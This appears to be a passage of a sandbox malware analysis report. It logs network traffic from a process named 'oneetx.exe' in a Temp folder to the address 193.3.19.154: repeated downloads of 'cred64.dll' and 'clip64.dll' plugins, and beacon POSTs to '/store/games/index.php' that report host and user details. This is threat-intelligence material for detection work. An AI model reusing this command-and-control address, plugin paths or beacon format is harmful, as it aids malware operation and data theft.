                  Nov 22, 2024 23:04:02.181472063 CET8049953193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:06.063657999 CET4995380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:06.175354958 CET4996480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:06.294794083 CET8049964193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:06.294897079 CET4996480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:06.295145988 CET4996480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:06.414581060 CET8049964193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:10.282474995 CET4996480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:10.395657063 CET4997380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:10.515227079 CET8049973193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:10.515496016 CET4997380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:10.519671917 CET4997380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:10.639246941 CET8049973193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:14.517079115 CET4997380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:14.628560066 CET4998180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:14.748229027 CET8049981193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:14.749531031 CET4998180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:14.749638081 CET4998180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:14.869158983 CET8049981193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:18.751432896 CET4998180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:18.863853931 CET4999280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:18.985131979 CET8049992193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:18.987601042 CET4999280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:19.018697977 CET4999280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:19.138192892 CET8049992193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:23.016896963 CET4999280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:23.128665924 CET5000380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:23.248241901 CET8050003193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:23.248317003 CET5000380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:23.248563051 CET5000380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:23.383718014 CET8050003193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:27.251214027 CET5000380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:27.364262104 CET5001380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:27.484175920 CET8050013193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:27.484256029 CET5001380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:27.484415054 CET5001380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:27.603969097 CET8050013193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:31.485698938 CET5001380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:31.598577976 CET5002480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:31.718094110 CET8050024193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:31.718170881 CET5002480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:31.718524933 CET5002480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:31.838184118 CET8050024193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:35.704473972 CET5002480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:35.820086002 CET5003580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:35.939560890 CET8050035193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:35.939636946 CET5003580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:35.939897060 CET5003580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:36.059720039 CET8050035193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:39.954324007 CET5003580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:40.067095041 CET5004480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:40.186681032 CET8050044193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:40.186773062 CET5004480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:40.187061071 CET5004480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:40.306531906 CET8050044193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:44.188956022 CET5004480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:44.303527117 CET5004780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:44.423084974 CET8050047193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:44.423234940 CET5004780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:44.423559904 CET5004780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:44.542980909 CET8050047193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:48.439563036 CET5004780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:48.551609993 CET5004880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:48.671241999 CET8050048193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:48.671708107 CET5004880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:48.675873041 CET5004880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:48.795475960 CET8050048193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:52.673518896 CET5004880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:52.785542011 CET5004980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:52.905227900 CET8050049193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:52.905644894 CET5004980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:52.909507990 CET5004980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:53.028903961 CET8050049193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:56.908147097 CET5004980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:57.021523952 CET5005080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:57.141648054 CET8050050193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:57.141851902 CET5005080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:57.142074108 CET5005080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:57.261655092 CET8050050193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:01.157744884 CET5005080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:01.270953894 CET5005180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:01.391875982 CET8050051193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:01.391994953 CET5005180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:01.392184019 CET5005180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:01.511697054 CET8050051193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:05.392163038 CET5005180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:05.505002022 CET5005280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:05.624890089 CET8050052193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:05.624986887 CET5005280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:05.625243902 CET5005280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:05.745136976 CET8050052193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:09.626400948 CET5005280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:09.739665985 CET5005380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:09.859337091 CET8050053193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:09.859435081 CET5005380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:09.859699011 CET5005380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:09.979588032 CET8050053193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:13.861186028 CET5005380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:13.973723888 CET5005480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:14.093556881 CET8050054193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:14.093636990 CET5005480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:14.093854904 CET5005480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:14.213390112 CET8050054193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:18.095204115 CET5005480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:18.208044052 CET5005580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:18.327743053 CET8050055193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:18.329767942 CET5005580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:18.333609104 CET5005580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:18.453161955 CET8050055193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:22.350850105 CET5005580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:22.477061987 CET5005680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:22.596735001 CET8050056193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:22.596859932 CET5005680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:22.598258972 CET5005680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:22.717988968 CET8050056193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:26.610714912 CET5005680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:26.722839117 CET5005780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:26.842545986 CET8050057193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:26.842720985 CET5005780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:26.843091965 CET5005780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:26.962790012 CET8050057193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:30.845217943 CET5005780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:30.959628105 CET5005880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:31.079607964 CET8050058193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:31.079741955 CET5005880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:31.080040932 CET5005880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:31.199644089 CET8050058193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:35.097656965 CET5005880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:35.207537889 CET5005980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:35.327068090 CET8050059193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:35.327141047 CET5005980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:35.327351093 CET5005980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:35.467480898 CET8050059193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:39.317668915 CET5005980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:39.427155972 CET5006080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:39.546902895 CET8050060193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:39.547007084 CET5006080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:39.547302008 CET5006080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:39.666935921 CET8050060193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:43.548366070 CET5006080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:43.662460089 CET5006180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:43.782196045 CET8050061193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:43.782342911 CET5006180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:43.782538891 CET5006180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:43.902124882 CET8050061193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:47.767632961 CET5006180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:47.880779028 CET5006280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:48.001115084 CET8050062193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:48.001311064 CET5006280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:48.001888990 CET5006280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:48.121491909 CET8050062193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:52.004667044 CET5006280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:52.114799976 CET5006380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:52.234529018 CET8050063193.3.19.154192.168.2.4
                  Nov 22, 2024 23:05:52.234627008 CET5006380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:52.234913111 CET5006380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:05:52.354547024 CET8050063193.3.19.154192.168.2.4
                  • 193.3.19.154
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:01:49.748624086 CET68OUTGET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449731193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:01:49.749084949 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449732193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:01:53.872288942 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.449733193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:01:58.108654022 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.449734193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:01:58.777911901 CET68OUTGET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449735193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:02.327446938 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449737193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:06.562109947 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.449739193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:07.231005907 CET68OUTGET /store/games/Plugins/cred64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.449742193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:10.777719975 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449745193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:14.999185085 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449746193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:15.699085951 CET68OUTGET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449747193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:19.231146097 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449748193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:23.467364073 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.449749193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:24.137197018 CET68OUTGET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.449750193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:27.702537060 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.449751193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:31.936975956 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.449752193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:32.648214102 CET68OUTGET /store/games/Plugins/clip64.dll HTTP/1.1
                  Host: 193.3.19.154


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.449753193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:36.169647932 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.449755193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:40.418342113 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.449766193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:44.654630899 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.449775193.3.19.154806384C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 22, 2024 23:02:48.889089108 CET241OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 87
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
